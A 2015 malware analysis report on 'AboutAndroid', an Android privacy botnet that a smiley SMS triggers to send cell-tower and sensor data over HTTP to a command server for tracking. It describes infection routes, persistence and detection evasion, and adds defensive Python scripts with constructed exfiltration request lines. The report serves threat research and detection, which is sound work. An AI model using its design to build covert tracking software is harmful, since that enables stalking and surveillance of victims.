Meet the Potnet
Next generation Privacy botnet
AboutAndroid | Malware Analysis Report
Eran Goldstein
Senior Cyber Security & Malware Researcher at ZIMPERIUM
GENERAL NOTES:
THE FOLLOWING INFORMATION SUMMARIZES THE “POTNETS AND NEXT
GENERATION BOTNET TECHNIQUES” RESEARCH PROCESS AND CONTAINS
SENSITIVE INFORMATION. THIS PAPER ANALYZES IN DETAIL THE
“ABOUTANDROID” ANDROID MALWARE AND BRINGS EVIDENCE THAT
MOBILE DEVICES WILL GET MORE AND MORE INFECTED IN THE NEAR FUTURE,
LEVERAGING SYSTEMS ALREADY USED ON THE FIXED SIDE.
WARNING:
ABOUTANDROID IS A THREAT FOR BOTH USERS AND ORGANIZATIONS AS IT
EXPOSES CLIENTS TO PRIVACY ISSUES. ALL THE TOOLS AND
APPLICATIONS DEMONSTRATED IN THIS DOCUMENT WERE
DEVELOPED FOR RESEARCH PURPOSES ONLY; IT IS STRONGLY
RECOMMENDED THAT YOU DO NOT USE THESE TOOLS FOR ILLEGAL
PURPOSES. ALL RIGHTS TO THE KEYWORDS “POTNET” AND “POTNETS” AND
THEIR DEFINITION ARE REGISTERED AND RESERVED TO THE AUTHOR OF
THIS MANUAL.
CLARIFICATION:
WE WILL NOT BE RESPONSIBLE FOR ANY DAMAGE CAUSED BY USING
THE TOOLS, APPLICATIONS OR TECHNIQUES DEMONSTRATED.
Table of Contents
Introduction
The next generation of privacy botnet
Suspicious Activity
Analysis
  Malware Sample
  Infection
  Operation
  Command and Control (C&C)
  Network Impact
Proof-of-Concept
Conclusions
Introduction
Cyber security researchers discovered a new technique and methodology of privacy botnet that
allows an attacker to obtain a user's personal information, detailed location, movement and motion
surveillance, area mapping and more.
The malware found was designed to work in stealth mode, running as a receiver behind a
background system service. Once the attacker sends an SMS message containing a particular
body text (for example, a question mark or a smiley) to the target device, the device sends out
private information that requires no special permission or dialog-box approval from the
victim.
The core functionality, and the real advantage of the potnet (or privacy botnet) from an attacker's
point of view, is the ability to obtain different types of data from the victim's device, including
cellular network information and other sensor data of the targeted victim.
The malware allows an attacker to obtain information about the geolocation and positioning of
the target device. This data is calculated on the potnet C&C server and is then available to the attacker
in order to track the target device's exact motions.
Diagram 1.0: Human tracking system
Next generation of privacy botnet
Potnets, the next generation of privacy botnets, do not act as a banking Trojan: they are not
designed to steal your banking credentials, log into your account or transfer your funds
to criminals. They are the type of malware designed to track your motion, movement and
geolocation, so that this data can be used for social engineering and advanced positioning and
tracking techniques.
The potnet malware that was found does this essentially by grabbing the victim's information and
sending it to certain websites. These websites are pre-specified by the attackers, and they are typically
Command and Control (C&C) servers hosted anonymously on a third-party web hosting service.
The collected data is then processed on the server side in order to give the attacker an
accurate picture of the victim. By keeping processing time on the client side of the malware short,
the data sent to the server is minimized, thus reducing the possibility of detection by client-side
defense mechanisms.
Using non-conventional device data allows the attacker to track victims located in low-
connectivity or bad-signal environments such as inside buildings and even underground (according
to the cellular data signal).
Diagram 1.1: Tracking victims in low-connectivity or bad-signal environments
Suspicious Activity
In the next example we are going to explain the suspicious activities of potnet malware through the
code implementation and demonstration of the AboutAndroid.apk malware.
The AboutAndroid malware takes advantage of perfectly legitimate data that can be read
without the need for any special permission or dialog approval on the client side, which makes the
detection of potnet malware quite difficult.
The AboutAndroid malware that was analyzed is suspicious due to the following symptoms and running
activities:
1. Ability to obtain private data from the system without any prior notification and without
the user's approval.
2. Ability to obtain private data from the system without any prior notification and without
any special permission.
3. Responsible for high battery energy consumption.
One of the harmful aspects of the potnet malware family is that once it enters the target
mobile device, it is very difficult to detect it or to know the exact trigger used in order to
send information or data out from the device.
Diagram 1.2: The Cell tower (cellid), Cellphone and the signal
Analysis
The AboutAndroid malware logs the user's sensor and cellular network data.
Once executed, the malware registers an incoming-SMS broadcast receiver and then waits for a specific
SMS text message, one whose body contains a smiley or a question mark, for example. Once
the SMS message arrives, the malware logs all activity related to specific sensor data and
the cellular network information, including the cell id, LAC, MNC, MCC, etc., and sends them to the
potnet C&C server.
Sending only a small amount of data to the C&C server at the backend reduces the possibility of
detection by client-side defense mechanisms (such as anti-virus or other signature-based protection
techniques). This methodology of calculating additional information related to
the victim by correlating the collected data with third-party APIs and other web services is one of
the advantages of potnets and next generation botnets.
This kind of attack must rely on a strong social engineering lure in order to
convince the user to click on a malicious link, or hope that the user will be tricked into installing an
app. Once this is done, the AboutAndroid malware stays persistent on the victim device and can
be triggered via SMS message.
Diagram 1.3: Triangulation is calculated according to the signal of every base-station (cell tower)
Malware Sample
The diagram below shows the report of an AboutAndroid malware sample that was scanned using the
VirusTotal service by 56 different antivirus engines and found to be clean.
In an attempt to look like non-malicious software, the AboutAndroid malware uses the namespace
“com.google.aboutandroid”.
Diagram 1.4: VirusTotal scan report
Infection
Infection with AboutAndroid can be carried out in different ways. For example, phishing spam can be used to
lure the victim to an infected web site, where an embedded <iframe> causes the browser to
automatically download a file called AboutAndroid.apk (or any other file name). The user must then install
it by clicking on the downloaded file and following the manual installation process.
Other techniques can be implemented using mobile application markets, 3rd-party websites or
Trojan-Downloaders.
Trojan-Downloaders are often distributed as part of the payload of another malware, such as a
Trojan-Dropper. Trojan-Downloaders may also be distributed as a file attachment to spam e-mails:
you get an e-mail that seems to come from a high-profile company with an attached invoice (for
example) in the form of a .doc or a .pdf document. The invoice looks innocuous enough, but here's
the catch: it can run a PDF reader exploit or Microsoft Word macros in order to install the
malware.
Once installed, there is no application icon on the screen or any user interface to interact with.
This is because our malware has installed itself as a background service that only starts when the
screen is unlocked by the user or when the device is rebooted.
The malware service listens for the ON_BOOT or USER_PRESENT intents.
The only evidence that the malware is installed is in the “Manage Applications” section of
“Settings”, which shows that an application called “com.google.aboutandroid” is running.
You can get rid of the infection by uninstalling the application.
Diagram 2.0: Installation of AboutAndroid Malware POC
Operation
When the malware's service starts, it registers a broadcast receiver in the background service and a
SensorEventListener.
Diagram 2.1: The malware registers a sensor event listener
Once an SMS message that contains ":-)" as body text arrives on the device, the app logs the infected
device's sensor values and cellular network information and then opens a TCP connection to the
primary potnet C&C server.
Diagram 2.2: Check whether the SMS message contains ":-)" as body text
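The Infection and Operation sections together describe a static profile that an analyst can check for in a manifest before any dynamic analysis: no launcher activity, a receiver that starts the service on boot or screen unlock, an incoming-SMS receiver as the trigger channel, a background service, and network access. The following triage script is an added example written for this report; it is not the AboutAndroid code and not a Zimperium tool. Both manifests in it are constructed, the action strings are the real Android ones (the author's "ON_BOOT" corresponds to android.intent.action.BOOT_COMPLETED), and the threshold of three matching traits is an assumption chosen for illustration.

```python
"""Static triage of an Android manifest for the AboutAndroid-style profile
described in the Infection and Operation sections: no launcher activity,
a service started on boot or screen unlock, an SMS-triggered receiver and
network access. Added example; the manifests below are constructed."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = "{%s}name" % ANDROID_NS   # attribute key for android:name

# Real action/permission strings; the report's "ON_BOOT" is BOOT_COMPLETED.
PERSISTENCE_ACTIONS = {
    "android.intent.action.BOOT_COMPLETED",
    "android.intent.action.USER_PRESENT",
}
SMS_ACTION = "android.provider.Telephony.SMS_RECEIVED"
MAIN_ACTION = "android.intent.action.MAIN"
LAUNCHER_CATEGORY = "android.intent.category.LAUNCHER"

# Constructed manifest mirroring the symptoms the report lists; it is not
# the real AboutAndroid manifest (package name is a placeholder).
SUSPECT_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.hidden">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Hidden">
    <service android:name=".BgService"/>
    <receiver android:name=".StartReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
        <action android:name="android.intent.action.USER_PRESENT"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".SmsReceiver">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed benign counterpart: an ordinary app with a launcher icon.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""


def _filter_names(component, tag):
    """android:name values of <tag> elements inside a component's intent filters."""
    return {e.get(NAME) for f in component.iter("intent-filter") for e in f.iter(tag)}


def triage_manifest(xml_text):
    """Return the traits matching the stealth-service profile and a verdict."""
    root = ET.fromstring(xml_text)
    perms = {e.get(NAME) for e in root.iter("uses-permission")}
    findings = []

    has_launcher = any(
        MAIN_ACTION in _filter_names(a, "action")
        and LAUNCHER_CATEGORY in _filter_names(a, "category")
        for a in root.iter("activity"))
    if not has_launcher:
        findings.append("no launcher activity: no icon, no UI to interact with")

    receiver_actions = set()
    for r in root.iter("receiver"):
        receiver_actions |= _filter_names(r, "action")
    persistence = receiver_actions & PERSISTENCE_ACTIONS
    if persistence:
        findings.append("starts on boot/unlock: " + ", ".join(sorted(persistence)))
    if SMS_ACTION in receiver_actions or "android.permission.RECEIVE_SMS" in perms:
        findings.append("incoming-SMS receiver: possible remote trigger channel")
    if next(root.iter("service"), None) is not None:
        findings.append("background service declared")
    if "android.permission.INTERNET" in perms:
        findings.append("INTERNET permission: exfiltration channel")

    return {"package": root.get("package"),
            "findings": findings,
            # Assumed threshold: three or more of the five traits match the profile.
            "suspicious": len(findings) >= 3}


if __name__ == "__main__":
    for manifest in (SUSPECT_MANIFEST, BENIGN_MANIFEST):
        print(triage_manifest(manifest))
```

On a real APK the manifest is binary XML and must first be decoded (for example with the apktool or androguard projects) before this parser sees it; the heuristic itself is unchanged. INTERNET alone is not a signal, which is why the benign manifest ends with one finding and no verdict.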
Command and Control (C&C)
A fairly simple command and control protocol is used to send data over an HTTP connection. The
potnet C&C server compensates for this simplicity: it is predominantly used to access different APIs
and web services in order to calculate additional information about the physical environment of the
victim device and to perform a triangulation using the cell id and neighboring-cell network
information.
Diagram 2.3: The C&C server's IP address
In addition, in order to translate the victim device data into accurate and valuable motion tracking
information, the C&C server performs a geometric calculation correlated with the collected sensor
data.
Diagram 2.4: Assign the parameter values and prepare the HTTP request to the C&C server
The sensor data collected comes from more than 7 different sensors, including the Barometer,
Proximity, Linear Acceleration, Gyroscope, Temperature, Gravity and Light sensors, and more.
Network Impact
In the diagram below we can see the HTTP request that arrives from the victim device, intercepted in
our Burp proxy. We can observe the different parameters that the app sends, for example:
client = the client mobile device's phone number.
cid = the cell id that the mobile device is connected to.
lac = Local Area Code of the cellular network provider.
mnc = Network Code of the cellular base station antenna provider.
mcc = Country Code of the cellular base station antenna.
signal = the signal level of the mobile device from the cellular base station antenna (in dBm).
cell_lon = the longitude of the cellular base station antenna (before triangulation).
cell_lat = the latitude of the cellular base station antenna (before triangulation).
Diagram 2.5: Intercepting the request from the victim device to the C&C server
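The parameter list above is the network-side fingerprint of the exfiltration: a single request carrying all four cellular identifiers (cid, lac, mnc, mcc) next to a signal level, tower coordinates and a phone number is not something an ordinary app emits. The script below is an added example of turning that observation into a proxy-log rule; it is not the report's code or a Zimperium tool. Every request line, host path and value in it is constructed, and the MCC/MNC digit-length check is an assumption added to cut accidental matches on unrelated parameters that happen to share a name.

```python
"""Proxy-log detection for the exfiltration request described in the Network
Impact section: one HTTP request carrying the four cellular identifiers
(cid, lac, mnc, mcc) together with signal level, tower coordinates and the
phone number. Added example; hosts, paths and values are constructed."""
from urllib.parse import parse_qs, urlsplit

# Parameter names exactly as the report lists them in the intercepted request.
CELL_ID_PARAMS = {"cid", "lac", "mnc", "mcc"}
CONTEXT_PARAMS = {"client", "signal", "cell_lon", "cell_lat"}

# Constructed request lines as a proxy would log them (not real captures).
SAMPLE_LOG = [
    "GET /upload.php?client=%2B15550001111&cid=12345&lac=678&mnc=01&mcc=310"
    "&signal=-87&cell_lon=-73.98&cell_lat=40.75 HTTP/1.1",
    "GET /api/weather?city=Boston&units=metric HTTP/1.1",
    "POST /report?cid=999&lac=12 HTTP/1.1",
    "GET /track?cid=1&lac=2&mnc=abc&mcc=9 HTTP/1.1",   # names match, values do not
]


def parse_request_line(line):
    """Split 'METHOD target HTTP/x.y' into method, path and a flat query dict."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return method, parts.path, params


def plausible_plmn(params):
    """Assumed sanity check: MCC is three digits, MNC two or three digits."""
    mcc, mnc = params.get("mcc", ""), params.get("mnc", "")
    return mcc.isdigit() and len(mcc) == 3 and mnc.isdigit() and len(mnc) in (2, 3)


def classify(line):
    """Label a request: cell-exfil (all identifiers, plausible), partial, or benign."""
    method, path, params = parse_request_line(line)
    cell_hits = CELL_ID_PARAMS & set(params)
    context_hits = CONTEXT_PARAMS & set(params)
    if cell_hits == CELL_ID_PARAMS and plausible_plmn(params):
        verdict = "cell-exfil"
    elif cell_hits:
        verdict = "partial"
    else:
        verdict = "benign"
    return {"method": method, "path": path, "verdict": verdict,
            "cell_params": sorted(cell_hits), "context_params": sorted(context_hits)}


def scan(lines):
    """Classify every request line; an alerting rule would act on 'cell-exfil'."""
    return [classify(line) for line in lines]


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["verdict"], r["method"], r["path"], r["cell_params"], r["context_params"])
```

The "partial" verdict exists so that a rule tuned on this fingerprint does not go silent if a later sample renames or drops one field; it is worth reviewing rather than alerting on. Because the report notes the request goes over plain HTTP, the same parameters are visible to any proxy or network sensor in the path, which is the point at which this detection applies.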
Proof-of-Concept
After launching one of the malware's hidden intents (an activity, not the main one) we can see how it
looks in the diagram below. The AboutAndroid Malware POC is installed on the victim device and we are
ready to begin with our simple scenario.
Diagram 3.0: AboutAndroid Malware POC – an activity intent launched (not in hidden mode)
1. In order to track the victim, the attacker sends an SMS message with the text of “” to the victim
device.
Diagram 3.1: The attacker sends the SMS message
2. The victim gets the SMS message.
Diagram 3.2: No suspicious activities on the victim device
Diagram 3.3: The victim device getting the SMS message
3. The attacker is now able to browse to the AboutAndroid potnet C&C server GUI console and get
all the relevant and valuable information about the victim.
Diagram 3.4: AboutAndroid potnet C&C server – part 1: basic information, indicators and the Motion Detection module
We can't observe any suspicious activity on the victim device.
In diagram 3.4 we can see that the basic information about our victim includes: cellular network
information, radio signal related data, the calculated device location, an “Inside building”
indicator, a floor level indicator, etc.
In addition, we can see the Motion Detection module (at the bottom right corner). The Motion
Detection module keeps showing us every exact motion of the victim device, triggered by any new
movement of our human target.
TIP: It is recommended to search the internet for the full video clip of this proof-of-concept
scenario in order to see the full feature list of the AboutAndroid malware.
In diagram 3.5 we can see the calculated data of the victim, including triangulation data, base-station
measurements and the estimated location of the victim device.
Diagram 3.5: AboutAndroid potnet C&C server – part 2: calculated data of the victim
Conclusions
It seems that running a standard antivirus sweep will not get rid of AboutAndroid or other potnet
malware, and since the program doesn't really make its presence known, you may be in trouble if
you find that you're already infected with it.
If you think you may have become infected by potnet malware, you should uninstall any suspicious
app that you are not familiar with; otherwise wipe your device and perform a “Factory reset”.
In my opinion, potnet malware tries to gain an advantage over the victim device by implementing an
incoming broadcast receiver, sensor listeners and other non-conventional data techniques, which
allow the malware to run in a quite stealthy mode and to obtain information from the victim
device without any user interruption or the need for a dialog approval on the client's side.
The AboutAndroid malware runs in the background as a service and its operation is not noticeable to
the user. However, it will likely consume considerable battery power when active, which will raise
suspicions. On the other hand, users with a capped data plan will notice almost no change in the
charges on their bill.
Once a specific app has been detected and signed, most mobile anti-virus products will be able to
detect and remove the threat by uninstalling the malicious app.
Notes for Android Developers and Google Security Team
Giving applications direct access to hardware is dangerous. It would be better if permissions were
required for sensor access. In addition, hardware should not provide more than what applications require,
and should provide only abstractions, not raw data.
http://www.zimperium.com
www.zimperium.com, ZIMPERIUM and Zimperium logo are trademarks of ZIMPERIUM Inc. All other trademarks are the
property of their respective owners. The information presented is subject to change without notice. ZIMPERIUM assumes
no responsibility for inaccuracies contained herein.
Copyright © 2015 ZIMPERIUM Inc. All rights reserved.

Contenu connexe

Similaire à Meet the potnet - AboutAndroid | Malware Analysis Report

trojon horse Seminar report
 trojon horse Seminar report trojon horse Seminar report
trojon horse Seminar reportNamanKikani
 
IRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET Journal
 
Review on mobile threats and detection techniques
Review on mobile threats and detection techniquesReview on mobile threats and detection techniques
Review on mobile threats and detection techniquesijdpsjournal
 
Cyber Malware Programs And The Internet
Cyber Malware Programs And The InternetCyber Malware Programs And The Internet
Cyber Malware Programs And The InternetHeidi Maestas
 
2nd Class PPT.pptx
2nd Class PPT.pptx2nd Class PPT.pptx
2nd Class PPT.pptxSibyJames1
 
When developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiWhen developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiSTO STRATEGY
 
Invesitigation of Malware and Forensic Tools on Internet
Invesitigation of Malware and Forensic Tools on Internet Invesitigation of Malware and Forensic Tools on Internet
Invesitigation of Malware and Forensic Tools on Internet IJECEIAES
 
Guarding Against Large-Scale Scrabble In Social Network
Guarding Against Large-Scale Scrabble In Social NetworkGuarding Against Large-Scale Scrabble In Social Network
Guarding Against Large-Scale Scrabble In Social NetworkEditor IJCATR
 
INTERNET SECURITY.pptx
INTERNET SECURITY.pptxINTERNET SECURITY.pptx
INTERNET SECURITY.pptxbabepa2317
 
When developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiWhen developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiYury Chemerkin
 
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...IJERA Editor
 
Report on Rogue Security Software: a summary
Report on Rogue Security Software: a summaryReport on Rogue Security Software: a summary
Report on Rogue Security Software: a summarySymantec Italia
 
Types of Malware.docx
Types of Malware.docxTypes of Malware.docx
Types of Malware.docxSarahReese14
 
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...IRJET Journal
 
Malware Applications Development.pptx
Malware Applications Development.pptxMalware Applications Development.pptx
Malware Applications Development.pptxFullstackSRM
 
Types of Malware (CEH v11)
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)EC-Council
 
Cyber-Security-CIT good for 1st year engineering students
Cyber-Security-CIT good for 1st year engineering studentsCyber-Security-CIT good for 1st year engineering students
Cyber-Security-CIT good for 1st year engineering studentsDrPraveenKumar37
 

Similaire à Meet the potnet - AboutAndroid | Malware Analysis Report (20)

trojon horse Seminar report
 trojon horse Seminar report trojon horse Seminar report
trojon horse Seminar report
 
IRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection Methods
 
Review on mobile threats and detection techniques
Review on mobile threats and detection techniquesReview on mobile threats and detection techniques
Review on mobile threats and detection techniques
 
HinDroid
HinDroidHinDroid
HinDroid
 
Cyber Malware Programs And The Internet
Cyber Malware Programs And The InternetCyber Malware Programs And The Internet
Cyber Malware Programs And The Internet
 
2nd Class PPT.pptx
2nd Class PPT.pptx2nd Class PPT.pptx
2nd Class PPT.pptx
 
When developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiWhen developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part ii
 
Invesitigation of Malware and Forensic Tools on Internet
Invesitigation of Malware and Forensic Tools on Internet Invesitigation of Malware and Forensic Tools on Internet
Invesitigation of Malware and Forensic Tools on Internet
 
Guarding Against Large-Scale Scrabble In Social Network
Guarding Against Large-Scale Scrabble In Social NetworkGuarding Against Large-Scale Scrabble In Social Network
Guarding Against Large-Scale Scrabble In Social Network
 
INTERNET SECURITY.pptx
INTERNET SECURITY.pptxINTERNET SECURITY.pptx
INTERNET SECURITY.pptx
 
When developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiWhen developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part ii
 
Network monitoring white paper
Network monitoring white paperNetwork monitoring white paper
Network monitoring white paper
 
Botnet
BotnetBotnet
Botnet
 
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...
 
Report on Rogue Security Software: a summary
Report on Rogue Security Software: a summaryReport on Rogue Security Software: a summary
Report on Rogue Security Software: a summary
 
Types of Malware.docx
Types of Malware.docxTypes of Malware.docx
Types of Malware.docx
 
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...
 
Malware Applications Development.pptx
Malware Applications Development.pptxMalware Applications Development.pptx
Malware Applications Development.pptx
 
Types of Malware (CEH v11)
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)
 
Cyber-Security-CIT good for 1st year engineering students
Cyber-Security-CIT good for 1st year engineering studentsCyber-Security-CIT good for 1st year engineering students
Cyber-Security-CIT good for 1st year engineering students
 

Dernier

Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 

Dernier (20)

Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
The State of Passkeys with FIDO Alliance.pptx

Meet the potnet - AboutAndroid | Malware Analysis Report

  • 3. Table of Contents
  Introduction (slide 4)
  The next generation of privacy botnet (slide 5)
  Suspicious Activity (slide 6)
  Analysis (slide 7)
    Malware Sample (slide 8)
    Infection (slide 9)
    Operation (slide 10)
    Command and Control (C&C) (slide 11)
    Network Impact (slide 12)
  Proof-of-Concept (slide 13)
  Conclusions (slide 16)
  • 4. Introduction
  Cyber security researchers discovered a new technique and methodology for a privacy botnet that lets an attacker obtain a user's personal information, detailed location, movement and motion surveillance, area mapping and more. The malware found was designed to run in stealth mode, as a broadcast receiver behind a background system service. Once the attacker sends an SMS message whose body contains a chosen trigger text (for example a question mark or a smiley) to the target device, the device sends out private information that requires no special permission and no dialog-box approval from the victim.
  The core functionality, and the real advantage of the potnet (privacy botnet) from an attacker's point of view, is the ability to collect different kinds of data from the victim's device, including cellular network information and other sensor data. The malware gives the attacker information about the geolocation and positioning of the target device. This data is calculated on the potnet C&C server and then made available to the attacker in order to track the target device's exact movements.
  Diagram 1.0: Human tracking system
  • 5. Next generation of privacy botnet
  Potnet and the next generation of privacy botnets do not act as banking Trojans: they are not designed to steal banking credentials, log into accounts or transfer funds to criminals. They are malware designed to track the victim's motion, movement and geolocation so that this data can be used for social engineering and for advanced positioning and tracking. The potnet malware found does this by grabbing the victim's information and sending it to certain web sites. These sites are pre-specified by the attackers and are typically Command and Control (C&C) servers hosted anonymously at a third-party hosting provider. The collected data is then processed on the server side to give the attacker an accurate picture of the victim.
